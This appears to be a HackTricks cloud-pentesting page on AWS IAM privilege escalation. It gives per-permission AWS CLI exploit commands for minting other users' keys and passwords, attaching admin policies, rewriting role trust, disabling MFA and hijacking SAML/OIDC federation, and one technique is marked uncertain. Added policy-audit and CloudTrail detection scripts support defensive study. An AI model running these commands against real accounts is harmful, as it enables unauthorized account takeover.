# AWS - IAM Privesc

{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## IAM

For more info about IAM check:

{% content-ref url="../aws-services/aws-iam-enum.md" %}
[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
{% endcontent-ref %}

### **`iam:CreatePolicyVersion`**

Grants the ability to create a new version of an IAM policy and, with the `--set-as-default` flag, make it the active version without needing the `iam:SetDefaultPolicyVersion` permission. The new version can contain whatever permissions the attacker chooses.

**Exploit Command:**

```bash
aws iam create-policy-version --policy-arn <policy_arn> \
  --policy-document file:///path/to/administrator/policy.json --set-as-default
```

**Impact:** Directly escalates privileges by allowing any action on any resource.

### **`iam:SetDefaultPolicyVersion`**

Allows changing the default version of an IAM policy to another existing version, escalating privileges if that version grants more permissions than the current one.

**Bash Command:**

```bash
aws iam set-default-policy-version --policy-arn <policy_arn> --version-id v2
```

**Impact:** Indirect privilege escalation by enabling more permissions.

### **`iam:CreateAccessKey`**

Enables creating an access key ID and secret access key for another user, leading to privilege escalation if that user has more permissions.

**Exploit:**

```bash
aws iam create-access-key --user-name <username>
```

**Impact:** Direct privilege escalation by assuming another user's extended permissions.

### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**

Permits creating or updating a login profile, i.e. setting the password another user uses for AWS console login, leading to direct privilege escalation.

**Exploit for Creation:**

```bash
aws iam create-login-profile --user-name target_user --no-password-reset-required \
  --password '<password>'
```

**Exploit for Update:**

```bash
aws iam update-login-profile --user-name target_user --no-password-reset-required \
  --password '<password>'
```

**Impact:** Direct privilege escalation by logging in as "any" user.

### **`iam:UpdateAccessKey`**

Allows re-enabling a disabled access key, leading to unauthorized access if the attacker already possesses the disabled key material.
**Exploit:**

{% code overflow="wrap" %}
```bash
aws iam update-access-key --access-key-id <access_key_id> --status Active --user-name <username>
```
{% endcode %}

**Impact:** Direct privilege escalation by reactivating access keys.

### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**

Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces). These credentials inherit the permissions of the associated user within that service.

**Exploit for Creation:**

{% code overflow="wrap" %}
```bash
aws iam create-service-specific-credential --user-name <username> --service-name <service_name>
```
{% endcode %}

**Exploit for Reset:**

{% code overflow="wrap" %}
```bash
aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>
```
{% endcode %}

**Impact:** Direct privilege escalation within the user's service permissions.

### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**

Allows attaching managed policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.

**Exploit for User:**

```bash
aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"
```

**Exploit for Group:**

```bash
aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"
```

**Impact:** Direct privilege escalation to anything the policy grants.

### **`iam:AttachRolePolicy`** (with `sts:AssumeRole` | `iam:CreateRole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**

Permits attaching managed policies or putting inline policies on roles, users, or groups, enabling direct privilege escalation by granting additional permissions. For roles, the added permissions are only useful if you can also assume the role (`sts:AssumeRole`) or create a role you control (`iam:CreateRole`).
**Exploit for Role:**

```bash
aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"
```

**Exploit for Inline Policies:**

```bash
aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
  --policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
  --policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
  --policy-document file:///path/to/policy.json
```

You can use a policy like:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "*"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}
```

**Impact:** Direct privilege escalation by adding permissions through policies.

### **`iam:AddUserToGroup`**

Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.

**Exploit:**

{% code overflow="wrap" %}
```bash
aws iam add-user-to-group --group-name <group_name> --user-name <username>
```
{% endcode %}

**Impact:** Direct privilege escalation to the level of the group's permissions.

### **`iam:UpdateAssumeRolePolicy`**

Allows altering the assume role policy document (trust policy) of a role, so that the attacker's principal can assume the role and obtain its permissions.

**Exploit:**

```bash
aws iam update-assume-role-policy --role-name <role_name> \
  --policy-document file:///path/to/assume/role/policy.json
```

Where the policy looks like the following, which gives the user permission to assume the role:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Principal": {
        "AWS": "$USER_ARN"
      }
    }
  ]
}
```

**Impact:** Direct privilege escalation by assuming any role's permissions.

### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**

Permits uploading an SSH public key for authenticating to CodeCommit as another user, or deactivating that user's MFA devices, leading to potential indirect privilege escalation.
**Exploit for SSH Key Upload:**

```bash
aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <public_key_body>
```

**Exploit for MFA Deactivation:**

```bash
aws iam deactivate-mfa-device --user-name <username> --serial-number <mfa_serial_number>
```

**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.

### **`iam:ResyncMFADevice`**

Allows resynchronizing an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.

**Bash Command:**

```bash
aws iam resync-mfa-device --user-name <username> --serial-number <mfa_serial_number> \
  --authentication-code1 <code1> --authentication-code2 <code2>
```

**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.

### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)

With these permissions you can **change the XML metadata of the SAML identity provider**. You could then abuse the **SAML federation** to **log in** with any **role that trusts** that provider. Note that while the metadata is replaced, **legitimate users won't be able to log in**. To limit the disruption you can first retrieve the current XML, upload your own, log in, and then restore the previous document.

```bash
# List SAML providers
aws iam list-saml-providers

# Optional: Get the current SAML provider XML so it can be restored later
aws iam get-saml-provider --saml-provider-arn <saml_provider_arn>

# Update the SAML provider metadata
aws iam update-saml-provider --saml-metadata-document <metadata_xml> --saml-provider-arn <saml_provider_arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <original_metadata_xml> --saml-provider-arn <saml_provider_arn>
```

{% hint style="info" %}
TODO: A Tool capable of generating the SAML metadata and login with a specified role
{% endhint %}

### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)

(Unsure about this) If an attacker has these **permissions**, they could add a new **thumbprint** to the provider in order to log in to all the roles that trust it.
{% code overflow="wrap" %}
```bash
# List providers
aws iam list-open-id-connect-providers

# Optional: Get the thumbprints currently in use so they are not removed
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <oidc_provider_arn>

# Update thumbprints (a thumbprint is always a 40-character hex string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <oidc_provider_arn> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
```
{% endcode %}

## References

* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
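The permissions listed on this page are the ones a policy reviewer should catch before a policy is ever attached. The following Python script is an added example (not HackTricks or AWS tooling) that audits an IAM policy document for exactly those actions: it expands the `*` and `?` wildcards IAM allows in `Action`, treats `NotAction` statements as granting every privesc action they do not exclude, and marks statements that carry a `Condition` so a human can judge whether the condition actually constrains the grant. The four policy documents at the bottom are constructed samples; only the all-wildcard admin policy appears on this page.

```python
"""Audit an IAM policy document for the privilege-escalation actions listed on this page.

Added example (not HackTricks or AWS tooling). The policy documents at the bottom are
constructed samples; only the all-wildcard admin policy appears on the page itself.
"""
import fnmatch
import json

# Actions discussed on this page and how directly each one escalates privileges.
PRIVESC_ACTIONS = {
    "iam:CreatePolicyVersion": "direct",
    "iam:SetDefaultPolicyVersion": "indirect",
    "iam:CreateAccessKey": "direct",
    "iam:CreateLoginProfile": "direct",
    "iam:UpdateLoginProfile": "direct",
    "iam:UpdateAccessKey": "direct",
    "iam:CreateServiceSpecificCredential": "direct",
    "iam:ResetServiceSpecificCredential": "direct",
    "iam:AttachUserPolicy": "direct",
    "iam:AttachGroupPolicy": "direct",
    "iam:AttachRolePolicy": "direct",
    "iam:PutUserPolicy": "direct",
    "iam:PutGroupPolicy": "direct",
    "iam:PutRolePolicy": "direct",
    "iam:AddUserToGroup": "direct",
    "iam:UpdateAssumeRolePolicy": "direct",
    "iam:UploadSSHPublicKey": "indirect",
    "iam:DeactivateMFADevice": "indirect",
    "iam:ResyncMFADevice": "indirect",
    "iam:UpdateSAMLProvider": "indirect",
    "iam:UpdateOpenIDConnectProviderThumbprint": "indirect",
}


def _as_list(value):
    """IAM accepts a string or a list for Action/NotAction/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action matching is case-insensitive and supports the '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def find_privesc_grants(policy_document):
    """Return one finding per privesc action granted by an Allow statement.

    NotAction statements allow everything except the listed actions, so every privesc
    action that is not excluded is reported. Statements carrying a Condition are still
    reported and flagged, because whether the condition really limits the grant needs
    a human look.
    """
    findings = []
    for idx, stmt in enumerate(_as_list(policy_document.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt:
            excluded = _as_list(stmt["NotAction"])
            granted = [a for a in PRIVESC_ACTIONS
                       if not any(_action_matches(p, a) for p in excluded)]
        else:
            patterns = _as_list(stmt.get("Action"))
            granted = [a for a in PRIVESC_ACTIONS
                       if any(_action_matches(p, a) for p in patterns)]
        # A statement that uses NotResource applies to everything outside the listed ARNs.
        resources = _as_list(stmt.get("Resource")) or ["<all but NotResource>"]
        for action in granted:
            findings.append({
                "statement": idx,
                "action": action,
                "severity": PRIVESC_ACTIONS[action],
                "resource": resources,
                "conditional": "Condition" in stmt,
            })
    return findings


# Constructed sample policies.
ADMIN_POLICY = {  # the policy shown on this page
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["*"], "Resource": ["*"]}],
}
READ_ONLY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Action": ["iam:Get*", "iam:List*", "sts:GetCallerIdentity"],
                   "Resource": "*"}],
}
SCOPED_POLICY = {  # one privesc action, limited to a single managed policy
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
                   "Resource": "arn:aws:iam::123456789012:policy/ExamplePolicy"}],
}
NOT_ACTION_POLICY = {  # looks restrictive, but NotAction grants everything else
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "NotAction": ["iam:Delete*", "iam:Detach*"],
                   "Resource": "*"}],
}

if __name__ == "__main__":
    for name, policy in [("admin", ADMIN_POLICY), ("read-only", READ_ONLY_POLICY),
                         ("scoped", SCOPED_POLICY), ("not-action", NOT_ACTION_POLICY)]:
        hits = find_privesc_grants(policy)
        print(f"{name}: {len(hits)} privesc grant(s)")
        for hit in hits[:3]:
            print("  ", json.dumps(hit))
```

A scoped `iam:CreatePolicyVersion` on a single policy ARN is still reported, because the new version can grant anything to whichever principals already have that policy attached; the `resource` field is there so the reviewer can see how wide the blast radius is.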
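On the detection side, every command on this page is a management API call that CloudTrail records with `eventSource` `iam.amazonaws.com`, including denied attempts. The script below is an added example (not HackTricks tooling) that classifies such records into three buckets that match the sections above: credentials issued for a user other than the caller, permission changes (with `AdministratorAccess` attachments called out), and MFA or federation trust changes. Self-targeted credential calls are deliberately dropped as routine rotation, which is a tuning choice, not a rule. The records are constructed for this example and follow CloudTrail's camelCase request parameter naming (`setAsDefault`, `sAMLProviderArn`, `openIDConnectProviderArn` are taken from the CloudTrail schema as assumptions); in practice you would feed it lines from an exported log file or an Athena query.

```python
"""Hunt CloudTrail for the IAM privilege-escalation calls covered on this page.

Added example, not HackTricks tooling. SAMPLE_LOG is constructed to mimic CloudTrail's
record shape (eventSource, eventName, userIdentity, requestParameters, errorCode).
"""
import json

# Calls that mint or revive credentials for a user; suspicious when the target is someone else.
CREDENTIAL_EVENTS = {
    "CreateAccessKey", "UpdateAccessKey", "CreateLoginProfile", "UpdateLoginProfile",
    "CreateServiceSpecificCredential", "ResetServiceSpecificCredential", "UploadSSHPublicKey",
}
# Calls that change what a principal is allowed to do.
POLICY_EVENTS = {
    "CreatePolicyVersion", "SetDefaultPolicyVersion", "AttachUserPolicy", "AttachGroupPolicy",
    "AttachRolePolicy", "PutUserPolicy", "PutGroupPolicy", "PutRolePolicy",
    "AddUserToGroup", "UpdateAssumeRolePolicy",
}
# Calls that weaken a second factor or redirect a federation trust.
TRUST_EVENTS = {
    "DeactivateMFADevice", "ResyncMFADevice", "UpdateSAMLProvider",
    "UpdateOpenIDConnectProviderThumbprint",
}


def _caller_name(identity):
    """Best-effort caller name: the IAM user name, or the last ARN segment for role sessions."""
    if identity.get("userName"):
        return identity["userName"]
    return identity.get("arn", "unknown").rsplit("/", 1)[-1]


def classify_event(record):
    """Return an alert dict for a privesc-relevant IAM call, or None for anything else."""
    if record.get("eventSource") != "iam.amazonaws.com":
        return None
    name = record.get("eventName", "")
    params = record.get("requestParameters") or {}
    actor = _caller_name(record.get("userIdentity") or {})
    # Denied calls are kept: a failed CreateAccessKey for another user is still worth a look.
    alert = {"event": name, "actor": actor, "denied": record.get("errorCode") == "AccessDenied"}

    if name in CREDENTIAL_EVENTS:
        target = params.get("userName")
        if target is None or target == actor:
            return None  # self-service rotation is routine; tune this for your environment
        alert.update(target=target, reason="credentials issued for another user")
    elif name in POLICY_EVENTS:
        alert.update(target=params.get("policyArn") or params.get("roleName")
                     or params.get("userName") or params.get("groupName"),
                     reason="permission change")
        if name == "CreatePolicyVersion" and not params.get("setAsDefault"):
            alert["reason"] = "new policy version (not yet default)"
        if str(params.get("policyArn", "")).endswith("/AdministratorAccess"):
            alert["reason"] = "AdministratorAccess attached"
    elif name in TRUST_EVENTS:
        alert.update(target=params.get("serialNumber") or params.get("sAMLProviderArn")
                     or params.get("openIDConnectProviderArn"),
                     reason="MFA or federation trust modified")
    else:
        return None
    return alert


def detect(records):
    """Run classify_event over an iterable of CloudTrail records and collect the alerts."""
    return [alert for alert in (classify_event(r) for r in records) if alert]


# Constructed CloudTrail-style records, one JSON object per line.
SAMPLE_LOG = """
{"eventSource": "iam.amazonaws.com", "eventName": "GetUser", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"userName": "alice"}}
{"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"userName": "alice"}}
{"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"userName": "bob"}}
{"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/ReadOnlyHelper", "setAsDefault": true}}
{"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"userName": "alice", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}}
{"eventSource": "iam.amazonaws.com", "eventName": "UpdateAssumeRolePolicy", "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::123456789012:assumed-role/DeployRole/ci-job"}, "requestParameters": {"roleName": "AdminRole"}, "errorCode": "AccessDenied"}
{"eventSource": "iam.amazonaws.com", "eventName": "UpdateSAMLProvider", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {"sAMLProviderArn": "arn:aws:iam::123456789012:saml-provider/Corp"}}
{"eventSource": "ec2.amazonaws.com", "eventName": "RunInstances", "userIdentity": {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}, "requestParameters": {}}
"""
SAMPLE_RECORDS = [json.loads(line) for line in SAMPLE_LOG.strip().splitlines()]

if __name__ == "__main__":
    for alert in detect(SAMPLE_RECORDS):
        print(json.dumps(alert))
```

Of the eight constructed records, five produce alerts: the access key created for `bob`, the policy version set as default, the `AdministratorAccess` attachment, the denied `UpdateAssumeRolePolicy` from the `ci-job` role session, and the SAML provider update. `GetUser`, the self-issued access key and the EC2 call are ignored. Pairing these alerts with the policy audit above (who was *able* to make the call) is what turns a noisy IAM feed into something an analyst can act on.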